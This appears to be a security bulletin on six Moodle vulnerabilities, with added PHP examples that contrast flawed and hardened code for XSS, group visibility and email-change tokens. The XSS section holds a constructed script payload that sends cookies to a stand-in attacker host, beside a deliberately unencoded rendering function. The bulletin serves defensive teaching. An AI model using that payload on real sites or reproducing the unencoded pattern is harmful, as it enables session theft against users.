SB2024121718 - Multiple vulnerabilities in Moodle


Published: December 17, 2024

Security Bulletin ID: SB2024121718
Severity: Medium
Patch available: YES
Number of vulnerabilities: 6
Exploitation vector: Remote access
Highest impact: Data manipulation

Breakdown by Severity

Medium: 17% (1 of 6)
Low: 83% (5 of 6)

Description

This security bulletin contains information about 6 security vulnerabilities.


1) Resource management error (CVE-ID: CVE-2024-55648)

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to improper management of internal resources within the application when handling guest sessions. Guest sessions are given a longer timeout than regular user sessions, so a remote attacker can create a large number of them, exhaust session resources and potentially cause a denial of service (DoS).


2) Cross-site scripting (CVE-ID: CVE-2024-55647)

The vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in the question bank filter. A remote attacker can trick the victim into following a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks.
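The pattern behind this class of bug, as an added example that is not Moodle's question bank code: a filter value reflected into an HTML attribute without encoding, beside the hardened form. The function names and the payload are constructed for illustration. (Moodle's own helper for this is `s()`, which wraps `htmlspecialchars()`.)

```php
<?php
// Added example (not Moodle's code): a filter value reflected into the page
// without encoding, beside the hardened form. Function names and the payload
// are constructed for illustration.

function render_filter_vulnerable(string $filter): string {
    // Raw concatenation: an attacker-controlled value closes the attribute
    // and injects its own markup.
    return '<input type="text" name="filter" value="' . $filter . '">';
}

function render_filter_hardened(string $filter): string {
    // Encode for the HTML attribute context; ENT_QUOTES covers both quote styles.
    $safe = htmlspecialchars($filter, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="filter" value="' . $safe . '">';
}

// Constructed payload of the kind a crafted link could carry in a filter parameter.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

echo render_filter_vulnerable($payload), PHP_EOL;
// The output now contains a live <script> element that runs in the victim's session.

echo render_filter_hardened($payload), PHP_EOL;
// The output keeps the payload inside the attribute as inert text:
// value="&quot;&gt;&lt;script&gt;...&lt;/script&gt;"
```

The check to carry into review is the context: attribute values, element text, JavaScript strings and URLs each need their own encoder, and a value that was safe in one context is not automatically safe in another.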


3) Improper privilege management (CVE-ID: CVE-2024-55646)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists due to improper privilege management. In a database activity with separate groups mode enabled, a user who is not in any group (and does not have permission to access all groups) can see entries from members of all groups in the activity, rather than only entries of users who are likewise not in any group.
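The logic error described above, as an added example that is not Moodle's database activity code: the faulty check treats "viewer is in no group" as if it were "viewer may access all groups", and the corrected check only lets the capability unlock every entry. The `Entry` class, the `NO_GROUP` constant, the group-id lists and the function names are assumptions made for this illustration.

```php
<?php
// Added example (not Moodle's code): visibility of database activity entries in
// "separate groups" mode, with the faulty and corrected checks side by side.
// Entry, NO_GROUP and the function names are assumptions. Requires PHP 8.

const NO_GROUP = 0; // entries not attached to any group carry group id 0 (assumed)

final class Entry {
    public function __construct(public int $id, public int $groupid) {}
}

/**
 * Faulty logic: a viewer with no group memberships falls into the
 * "see everything" branch, so entries from every group are returned.
 */
function visible_entries_faulty(array $entries, array $viewergroups, bool $accessallgroups): array {
    if ($accessallgroups || $viewergroups === []) {
        return array_map(fn(Entry $e) => $e->id, $entries);
    }
    return array_values(array_map(
        fn(Entry $e) => $e->id,
        array_filter($entries, fn(Entry $e) => in_array($e->groupid, $viewergroups, true))
    ));
}

/**
 * Corrected logic: only the "access all groups" capability unlocks every entry.
 * A viewer in no group sees only entries that are also in no group; a viewer in
 * groups sees entries belonging to those groups.
 */
function visible_entries_fixed(array $entries, array $viewergroups, bool $accessallgroups): array {
    if ($accessallgroups) {
        return array_map(fn(Entry $e) => $e->id, $entries);
    }
    $allowed = $viewergroups === [] ? [NO_GROUP] : $viewergroups;
    return array_values(array_map(
        fn(Entry $e) => $e->id,
        array_filter($entries, fn(Entry $e) => in_array($e->groupid, $allowed, true))
    ));
}

// Constructed data: one entry from each of two groups, one from a user in no group.
$entries = [new Entry(1, 10), new Entry(2, 20), new Entry(3, NO_GROUP)];

var_dump(visible_entries_faulty($entries, [], false));  // ids 1, 2, 3: group entries leak
var_dump(visible_entries_fixed($entries, [], false));   // id 3 only
var_dump(visible_entries_fixed($entries, [10], false)); // id 1 only
var_dump(visible_entries_fixed($entries, [], true));    // ids 1, 2, 3 via the capability
```

The test case worth keeping in a regression suite is the second call: a viewer with an empty membership list and no capability must get only the no-group entries back.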


4) Information disclosure (CVE-ID: CVE-2024-55645)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists because the email change confirmation token is exposed via user preferences. A remote user, or an attacker with physical access to the system, can read the token from the preferences and later use it to confirm the email change without having access to the mailbox.
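Why a readable token defeats the mailbox check, and the usual hardening, as an added example that is not Moodle's implementation and does not claim to be the vendor's fix: persist only a hash of the token, so that reading the preference store yields nothing that can be presented for confirmation. The preference names, the in-memory `$prefs` array and the function names are assumptions.

```php
<?php
// Added example (not Moodle's code): a confirmation token that is stored where it
// can be read back lets anyone who reads it confirm the change; storing only a
// hash of the token removes that shortcut. Preference names and functions are assumed.

function start_email_change(array &$prefs, int $userid, string $newemail): string {
    $token = bin2hex(random_bytes(16));                       // delivered only to the new mailbox
    $prefs[$userid]['newemail'] = $newemail;
    $prefs[$userid]['newemailkey'] = hash('sha256', $token);  // store the hash, never the token
    $prefs[$userid]['newemailkey_expires'] = time() + 3600;
    return $token;                                            // caller emails this to $newemail
}

function confirm_email_change(array &$prefs, int $userid, string $presented): bool {
    $stored  = $prefs[$userid]['newemailkey'] ?? null;
    $expires = $prefs[$userid]['newemailkey_expires'] ?? 0;
    if ($stored === null || time() > $expires) {
        return false;
    }
    // Constant-time comparison of the hash of the presented value with the stored hash.
    if (!hash_equals($stored, hash('sha256', $presented))) {
        return false;
    }
    // Single use: consume the token on success.
    unset($prefs[$userid]['newemailkey'], $prefs[$userid]['newemailkey_expires']);
    return true;
}

$prefs = [];
$token = start_email_change($prefs, 42, 'victim@new.example');

// Someone who can read the preferences (the situation this item describes)
// obtains only the hash; presenting it does not confirm the change.
$leaked = $prefs[42]['newemailkey'];
var_dump(confirm_email_change($prefs, 42, $leaked)); // bool(false)

// Only the holder of the mailbox, who received $token, can confirm, and only once.
var_dump(confirm_email_change($prefs, 42, $token));  // bool(true)
var_dump(confirm_email_change($prefs, 42, $token));  // bool(false): already consumed
```

The same rule applies to any out-of-band secret (password reset keys, invitation codes): if the server only needs to recognise the secret, it should store a hash of it, with an expiry and single-use semantics.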


5) Improper access control (CVE-ID: CVE-2024-55644)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists due to improper access restrictions on the tag index page. A remote user can see users tagged with a tag regardless of whether they had access to view the users' profiles.


6) Improper access control (CVE-ID: CVE-2024-55643)

The vulnerability allows a remote user to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions within the learning plan web service. A remote user can bypass implemented security restrictions and gain access to sensitive information, such as usernames.


Remediation

Install the update from the vendor's website.